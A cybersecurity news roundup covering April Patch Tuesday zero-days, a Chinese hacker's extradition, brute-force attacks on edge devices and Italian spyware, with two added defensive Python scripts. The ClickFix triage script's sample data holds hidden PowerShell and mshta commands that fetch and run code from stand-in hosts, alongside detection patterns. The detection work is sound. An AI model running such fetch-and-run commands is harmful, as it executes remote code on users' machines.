
CyberSecurity

Microsoft Patches Two Zero-Day Vulnerabilities in April Patch Tuesday Release


Microsoft has rolled out its April Patch Tuesday update, addressing a significant number of security flaws, including two zero-day vulnerabilities. One of these is already being actively exploited in the wild, raising urgent concerns for IT administrators worldwide.

Active Exploitation: SharePoint Spoofing Flaw (CVE-2026-32201)

The first zero-day, tracked as CVE-2026-32201, is a server spoofing vulnerability in Microsoft SharePoint. This bug stems from improper input validation, allowing an unauthorized attacker to perform spoofing over a network. According to Mike Walters, president of Action1, the flaw can deceive users by manipulating how information is presented within trusted SharePoint environments.

“By exploiting this flaw, an attacker can manipulate how information is presented to users, potentially tricking them into trusting malicious content,” Walters explained. “While the direct impact on data is limited, the ability to deceive users makes this a powerful tool for broader attacks.”

Because the flaw controls what a user sees inside a trusted SharePoint site rather than the data itself, its value to an attacker lies in phishing and social engineering: a convincing page or document hosted on a site users already trust is a strong lure for organizations that rely on SharePoint for collaboration.

Publicly Disclosed but Not Exploited: Microsoft Defender EoP Bug (CVE-2026-33825)

The second zero-day, CVE-2026-33825, is an elevation of privilege (EoP) vulnerability in Microsoft Defender. While it has been publicly disclosed, it has not yet been exploited in active attacks. However, Jack Bicer, director of vulnerability research at Action1, warns that it could be chained with other vulnerabilities in real-world scenarios.

“CVE-2026-33825 significantly increases risk in environments where attackers have already gained a foothold,” Bicer said. “Once exploited, it allows full control over endpoints, enabling data exfiltration, disabling security tools, and lateral movement across networks.”

In other words, the bug does not get an attacker in, but it turns a low-privilege foothold into full control of the endpoint, so even organizations with strong perimeter defenses should treat it as a priority once any internal system is compromised.

EoP Bugs Dominate April Patch Tuesday

Elevation of privilege vulnerabilities are the largest category in this month's update, totaling 93 flaws. Information disclosure (21), remote code execution (20), and security feature bypass (13) round out the top categories by volume.

Critical RCE Flaw in Windows IKE Service (CVE-2026-33824)

Beyond the zero-days, Walters urged administrators to pay close attention to CVE-2026-33824. With a CVSS score of 9.8, this remote code execution vulnerability is the most dangerous on paper this month. It impacts the Windows Internet Key Exchange (IKE) service, and threat actors could exploit it remotely by sending specially crafted network packets.

“This issue poses a serious threat to enterprise environments, especially those relying on VPN or IPsec for secure communications,” Walters continued. “Successful exploitation can result in complete system compromise, allowing attackers to steal sensitive data, disrupt operations, or move laterally across the network.”

Hosts that expose the IKE service to the internet, which listens on UDP 500 and on UDP 4500 for NAT traversal, are the most at risk, since the crafted packets can be delivered without any authentication. Prompt patching of VPN gateways and any Windows servers terminating IPsec is essential.

Recommendations for IT Administrators

Given the active exploitation of the SharePoint spoofing flaw, security teams should prioritize applying the April Patch Tuesday updates immediately. While the IKE fix rolls out, monitoring IKE service logs and inbound traffic to internet-facing VPN endpoints for anomalies is advisable.

Finally, because Bicer notes the Defender bug is most useful to attackers who already have a foothold, patching SharePoint (the initial-access vector) and Defender (the privilege-escalation step) together closes the most plausible chain this month.


Alleged Chinese State-Sponsored Hacker Extradited to the United States After Italian Arrest


A man suspected of orchestrating cyberattacks on behalf of Beijing has been extradited to the United States, where he now faces serious federal charges. Xu Zewei, a contractor allegedly working for China's Ministry of State Security, could spend more than a decade behind bars if convicted. His case underscores the growing tension between Washington and Beijing over state-backed digital espionage.

The Extradition Journey: From Italy to Houston

Xu was taken into custody in Italy last year at the request of U.S. authorities. His Italian attorney, Simona Candido, confirmed to TechCrunch that he was handed over to American officials on Saturday. He now sits in the Federal Detention Center in Houston, Texas, according to the U.S. Bureau of Prisons database.

Following this development, the Justice Department formally announced Xu’s extradition in a press release. His U.S. lawyer, Dan Cogdell, told TechCrunch that Xu pleaded not guilty to all charges during a Monday morning court hearing. Court records show he appeared for his initial federal hearing and was remanded into custody.

Alleged Cyberattacks on Universities and Microsoft Exchange Servers

Prosecutors allege that Xu, along with co-conspirator Zhang Yu, targeted several American universities in early 2020 in order to steal sensitive research related to the COVID-19 pandemic. The duo is also accused of hacking thousands of email servers running Microsoft Exchange starting in March 2021, as part of a widespread campaign linked to the Chinese-backed hacking group Hafnium, later dubbed Silk Typhoon.

According to the Justice Department, Xu worked for Shanghai Powerock Network, a company that prosecutors say conducted hacking operations for Beijing. The hackers allegedly reported directly to Chinese state officials in Shanghai. The Hafnium group exploited previously unknown security flaws in Microsoft Exchange servers, targeting American defense contractors, law firms, think tanks, and infectious disease researchers.

Prosecutors claim the group targeted more than 60,000 entities in the U.S. and successfully breached over 12,700 of them, a scale that reached into critical infrastructure operators and holders of valuable intellectual property.

China’s Response and Diplomatic Fallout

The Chinese Embassy in Washington, D.C., did not respond to requests for comment. However, the Financial Times reported that the Chinese Foreign Ministry opposed Xu’s extradition, accusing the U.S. government of fabricating cases. This is not the first time Beijing has pushed back against such allegations, often framing them as politically motivated.

For years, the U.S. government has charged suspected Chinese hackers, though many remain at large. In 2022, Yanjun Xu was sentenced to 20 years in prison for economic espionage and theft of trade secrets, in what the DOJ called the first case where a Chinese government intelligence officer had been extradited to the United States. This latest extradition signals a continued effort by Washington to hold state-sponsored hackers accountable.

What This Means for Cybersecurity and International Law

This case highlights the challenges of prosecuting cybercriminals who operate across borders. The extradition of a Chinese hacker to the US is a rare but significant step. It demonstrates that international cooperation can still work, even in the murky world of state-sponsored cyberattacks. However, it also raises questions about the effectiveness of such actions in deterring future attacks.

As cyber threats grow more sophisticated, governments must adapt their legal frameworks. The US Justice Department has made it a priority to pursue hackers who target American institutions. Yet, without consistent global cooperation, many perpetrators remain beyond reach.


Conclusion: A Precedent for Future Cases?

Xu Zewei's extradition marks a milestone in the fight against state-sponsored cybercrime. He has pleaded not guilty, and the allegations against him remain to be tested in court. As the trial unfolds, the world will be watching to see whether this sets a precedent for holding Chinese hackers accountable in U.S. courts. For now, the message is clear: the United States is willing to go to great lengths to protect its digital borders.


Sharp Rise in Brute-Force Attacks Targets SonicWall and Fortinet Devices, Researchers Warn


Security researchers have observed a dramatic increase in brute-force attacks aimed at compromising SonicWall and Fortinet devices. According to a new report from Barracuda Networks, the vast majority of these attempts—88%—appear to originate from the Middle East. While many attacks were blocked, the trend signals a growing threat to perimeter security.

What Drives the Surge in Brute-Force Attacks?

Barracuda's analysis reveals that most of these brute-force attacks were unsuccessful, either thwarted by security tools or aimed at usernames that did not exist. However, the timing is noteworthy. The spike coincides with heightened US and Israeli hostilities against Iran, suggesting a possible geopolitical motive. Source IP geolocation is weak evidence of origin, since attackers routinely route traffic through proxies or compromised hosts in a region, but the pattern still raises alarms about state-linked cyber activity.

In recent weeks, Iranian-affiliated hackers have targeted US critical infrastructure and medtech firms. The line between state-sponsored operations and financially motivated cybercrime continues to blur, as seen with the resurgence of the Pay2Key ransomware group.

Why Edge Devices Are Prime Targets

Edge devices like VPNs and firewalls from SonicWall and Fortinet are internet-facing yet provide direct access to corporate networks, which makes them attractive targets for brute-force attacks. Barracuda reports that over half (56%) of all confirmed incidents from February to March involved brute-force activity against such devices.

“Attackers are aggressively scanning and testing perimeter devices for weak or exposed credentials,” warns Laila Mubashar, senior cybersecurity analyst at Barracuda. “Even when attacks fail, persistent probing raises the risk that a single weak password or misconfiguration could lead to compromise.”

How to Protect Your Network

To defend against these threats, organizations should take immediate action:

  • Enforce strong, unique passwords on all network and security devices.
  • Enable multi-factor authentication (MFA) on all VPNs, firewalls, and remote access services.
  • Monitor and investigate repeated failed login attempts, especially bursts from one source that cycle through non-existent usernames, which is the pattern Barracuda observed.
  • Restrict management interfaces to trusted IP ranges where possible.
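The monitoring step above is easy to state and easy to get wrong, because SonicWall and FortiGate emit failures in different syslog dialects and a spray of invalid usernames looks different from a password-guessing run against one account. The following is an added example, not Barracuda's or either vendor's code: it normalises FortiGate SSL-VPN and SonicWall admin-login failure events into one record, then applies a sliding-window count per source IP and reports how many distinct and non-existent usernames were tried. The log lines are constructed for the example, and the field names (action, remip, reason, msg, src, usr) follow the vendors' key=value style but should be checked against the exact firmware in use before this is trusted in production.

```python
"""Flag brute-force login activity against edge devices from raw syslog lines.

Added example (not vendor or Barracuda code). SAMPLE_LOGS is constructed to
resemble FortiGate SSL-VPN and SonicWall admin-login events; the field names are
assumptions based on the vendors' key=value syslog style, not a guarantee of any
specific firmware's format.
"""
import shlex
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.10 sprays four usernames across both devices in
# a few seconds; 198.51.100.77 is a single mistyped password from a real user.
SAMPLE_LOGS = """\
date=2026-03-02 time=08:00:01 devname="edge-fw1" type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip=203.0.113.10 user="admin" reason="sslvpn_login_permission_denied"
date=2026-03-02 time=08:00:03 devname="edge-fw1" type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip=203.0.113.10 user="test" reason="sslvpn_login_unknown_user"
date=2026-03-02 time=08:00:04 devname="edge-fw1" type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip=203.0.113.10 user="vpn" reason="sslvpn_login_unknown_user"
id=firewall sn=0017C5AABBCC time="2026-03-02 08:00:05 UTC" fw=198.51.100.2 pri=1 c=32 m=30 msg="Administrator login denied due to bad credentials" src=203.0.113.10:51522:X1 usr="admin"
date=2026-03-02 time=08:00:06 devname="edge-fw1" type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip=203.0.113.10 user="guest" reason="sslvpn_login_unknown_user"
date=2026-03-02 time=08:00:08 devname="edge-fw1" type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip=203.0.113.10 user="admin" reason="sslvpn_login_permission_denied"
date=2026-03-02 time=08:07:30 devname="edge-fw1" type="event" subtype="vpn" level="alert" action="ssl-login-fail" remip=198.51.100.77 user="jdoe" reason="sslvpn_login_permission_denied"
"""


def parse_kv(line):
    """Split a key=value syslog line into a dict; shlex handles quoted values."""
    fields = {}
    for token in shlex.split(line):
        if "=" in token:
            key, _, value = token.partition("=")
            fields[key] = value
    return fields


def normalise(fields):
    """Map a FortiGate or SonicWall failure event onto one record, or None if not a failure."""
    if fields.get("action") == "ssl-login-fail":                 # FortiGate SSL-VPN (assumed field names)
        ts = datetime.fromisoformat(f"{fields['date']} {fields['time']}")
        return {"ts": ts, "src": fields.get("remip"), "user": fields.get("user", ""),
                "unknown_user": "unknown_user" in fields.get("reason", "")}
    if "denied" in fields.get("msg", "").lower():                # SonicWall login denial (assumed field names)
        ts = datetime.fromisoformat(fields["time"].replace(" UTC", ""))
        src = fields.get("src", "").split(":")[0]                # drop ":port:interface" suffix
        return {"ts": ts, "src": src, "user": fields.get("usr", ""),
                "unknown_user": "unknown" in fields["msg"].lower()}
    return None


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return {src_ip: summary} for sources with >= threshold failures inside any window.

    The summary reports the densest qualifying window, how many distinct usernames
    were tried and how many of them the device did not recognise, which separates a
    username spray from a user who forgot their password.
    """
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = normalise(parse_kv(line))
        if rec and rec["src"]:
            by_src[rec["src"]].append(rec)

    alerts = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):                             # two-pointer sliding window
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            hits = recs[start:end + 1]
            if len(hits) >= threshold and len(hits) > alerts.get(src, {}).get("failures", 0):
                alerts[src] = {
                    "failures": len(hits),
                    "distinct_users": len({r["user"] for r in hits}),
                    "unknown_users": sum(r["unknown_user"] for r in hits),
                    "first": hits[0]["ts"].isoformat(),
                    "last": hits[-1]["ts"].isoformat(),
                }
    return alerts


if __name__ == "__main__":
    for src, summary in detect_bruteforce(SAMPLE_LOGS).items():
        print(src, summary)
```

Only 203.0.113.10 is reported: six failures in seven seconds across both devices, four usernames, three of which the gateway did not know. The threshold and window are deliberately parameters; a single device behind a shared NAT address will need looser values than an administrator-only VPN. Aggregating by source IP across vendors, as here, matters because a spray split between the SonicWall and the FortiGate stays under either device's own lockout counter.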


The Rise of ClickFix Social Engineering Attacks

Alongside the brute-force attacks, Barracuda highlights a surge in ClickFix attacks. These social engineering schemes trick users into copying and executing malicious scripts under the guise of fixing a non-existent technical issue. Mubashar explains that such attacks exploit user trust and anxiety.

“Attackers use familiar elements like pop-ups, prompts, and instructions to run a fix,” she adds. “Because ClickFix attacks rely on duping users into adding malicious commands themselves, they are harder for automated security systems to spot.”

To mitigate this threat, organizations should improve end-user education, restrict who can run PowerShell or command-line tools, and deploy monitoring for the behavior these lures produce: an interactive user suddenly launching a script interpreter that reaches out to the internet.
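ClickFix lures usually have the victim paste the command into the Windows Run dialog (Win+R), and Explorer records every Run-dialog command under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is a cheap place to look during triage of a suspected ClickFix host. The following is an added example, not Barracuda's code: it takes the values of that key as a dictionary (as you would get from exporting the key with reg query and stripping the trailing "\1" marker Explorer appends to each entry), orders them most-recent-first using the MRUList value, and scores each command against the traits these lures share: a script interpreter, a remote fetch, execution of fetched content, concealment flags, and the decorative "verification" comment used to make the pasted text look like a CAPTCHA step. The export below is constructed; the hostnames are in the reserved .invalid domain.

```python
"""Triage Windows Run-dialog history (RunMRU) for ClickFix-style pasted commands.

Added example (not Barracuda's code). RUNMRU_EXPORT is a constructed stand-in for
the values under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU;
Explorer stores each command with a literal "\\1" suffix and keeps recency order in
the MRUList value (most recent slot letter first).
"""
import re

# Constructed export: slot "c" is a textbook ClickFix paste, "d" a one-liner mshta
# download, "e" a benign Settings shortcut, "a" and "b" ordinary user activity.
RUNMRU_EXPORT = {
    "MRUList": "cdeab",
    "a": r"notepad\1",
    "b": r"\\fs01\it\tools\1",
    "c": r'powershell -w hidden -c "iwr http://example.invalid/fix.txt | iex" # "I am not a robot - reCAPTCHA Verification ID: 7624"\1',
    "d": r"mshta https://example.invalid/update.hta\1",
    "e": r"cmd /c start ms-settings:\1",
}

# Each indicator is one trait of a ClickFix paste; a benign command rarely shows two.
INDICATORS = {
    "interpreter": re.compile(
        r"\b(powershell|pwsh|mshta|cmd(\.exe)?\s*/[ck]|wscript|cscript|rundll32|regsvr32|msiexec|bitsadmin|certutil|curl)\b",
        re.I),
    "remote_fetch": re.compile(r"(https?://|\biwr\b|invoke-webrequest|downloadstring|invoke-restmethod|\birm\b)", re.I),
    "execute_fetched": re.compile(r"(\biex\b|invoke-expression|\|\s*(iex|powershell|cmd))", re.I),
    "concealment": re.compile(
        r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-nop\b|-noprofile|frombase64string)",
        re.I),
    # The lure appends a comment so the pasted text reads like a verification code.
    "fake_captcha_comment": re.compile(r"(#|::|rem\s).*(captcha|verif|not a robot|human)", re.I),
}


def run_entries(export):
    """Yield (slot, command) most-recent-first, stripping Explorer's trailing '\\1'."""
    for slot in export.get("MRUList", ""):
        raw = export.get(slot)
        if raw is None:
            continue
        yield slot, raw[:-2] if raw.endswith(r"\1") else raw


def triage_runmru(export, min_indicators=2):
    """Score each Run-dialog command; flag it when it shows at least min_indicators traits."""
    results = []
    for slot, command in run_entries(export):
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        results.append({
            "slot": slot,
            "command": command,
            "indicators": hits,
            "suspicious": len(hits) >= min_indicators,
        })
    return results


if __name__ == "__main__":
    for row in triage_runmru(RUNMRU_EXPORT):
        flag = "SUSPICIOUS" if row["suspicious"] else "ok"
        print(f"{row['slot']}: {flag:10} {row['indicators']} :: {row['command']}")
```

The most recent entry scores on all five traits and the mshta one-liner on two, while "cmd /c start ms-settings:" trips only the interpreter check and is left alone; that two-indicator floor is what keeps the check quiet on an administrator's own command-line use. The same scoring applies unchanged to the other places a pasted ClickFix command lands, such as PowerShell's ConsoleHost_history.txt or process-creation events from the endpoint agent, which is where the "monitoring for unusual behavior" recommendation above is normally implemented.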

Final Thoughts on the Growing Threat Landscape

The surge in brute-force attacks on SonicWall and Fortinet devices underscores the importance of robust perimeter security. As geopolitical tensions rise, attackers are becoming more persistent and sophisticated. By implementing strong authentication measures and educating users, organizations can reduce their risk of compromise.


Another Spyware Maker Exposed: Italian Firm IPS Caught Distributing Fake Android Surveillance Apps


Another Italian spyware maker has been caught in the act, this time distributing fake Android apps to install surveillance software on unsuspecting targets. A new report from Osservatorio Nessuno, an Italian digital rights organization, reveals how the company IPS used a deceptive phone-updating app to deploy its Morpheus spyware.

The discovery highlights the growing demand for spyware among law enforcement and intelligence agencies worldwide. As a result, numerous companies are quietly supplying these tools, often operating far from public scrutiny.

How the Morpheus Spyware Works

According to the researchers, Morpheus is a “low cost” spyware that relies on tricking victims into installing it themselves. Unlike advanced spyware from firms like NSO Group or Paragon Solutions, which use invisible zero-click attacks, Morpheus depends on social engineering.

In this case, according to the report, the target's mobile carrier deliberately cut the victim's data connection and then sent an SMS urging them to install a fake app to restore cellular access. The same playbook, which depends on the operator's cooperation, has been documented in other cases involving Italian spyware makers.

Once installed, the malware abused Android’s accessibility features to read screen data and interact with other apps. It then prompted a fake update, showed a reboot screen, and spoofed WhatsApp to request biometric authentication. Unbeknownst to the target, this granted the spyware full access to their WhatsApp account.

IPS: An Old Company with a New Spyware Product

Osservatorio Nessuno’s researchers, identified only as Davide and Giulio, linked the spyware to IPS based on its infrastructure. One IP address was registered to “IPS Intelligence Public Security.” Additionally, the malware code contained Italian phrases, including references to Gomorra and “spaghetti” — a common trait among Italian spyware makers.

IPS has operated for over 30 years, providing traditional lawful interception technology to governments. Its website lists several Italian police forces as customers and claims operations in more than 20 countries. However, the company did not respond to requests for comment about the spyware report.

The Target: Political Activism in Italy

Davide and Giulio could not reveal specific details about the target but believe the attack is “related to political activism” in Italy. They noted that such targeted attacks are increasingly common in this sphere.

A researcher at a cybersecurity firm who reviewed the report confirmed that the malware was developed by an Italian surveillance technology vendor. This aligns with a broader trend of Italian firms filling the void left by Hacking Team, one of the first commercial spyware makers.

The Rise of Italian Spyware Makers

IPS joins a long list of Italian spyware makers exposed in recent years, including CY4GATE, eSurv, GR Sistemi, Movia, Negg, Raxir, RCS Lab, and SIO. Earlier this month, WhatsApp notified around 200 users who installed a fake version of the app, which was actually spyware made by SIO.

In 2021, Italian prosecutors suspended their use of CY4GATE and SIO spyware due to serious malfunctions. This pattern raises questions about the oversight and regulation of surveillance technology in Italy and beyond.

Taken together, these cases show that demand for government spyware continues to drive innovation in deception tactics rather than only in exploits.

In conclusion, the exposure of IPS demonstrates that even established companies are turning to covert methods to meet the demands of law enforcement. As a result, users must remain vigilant against fake apps and suspicious messages, especially those claiming to fix network issues.
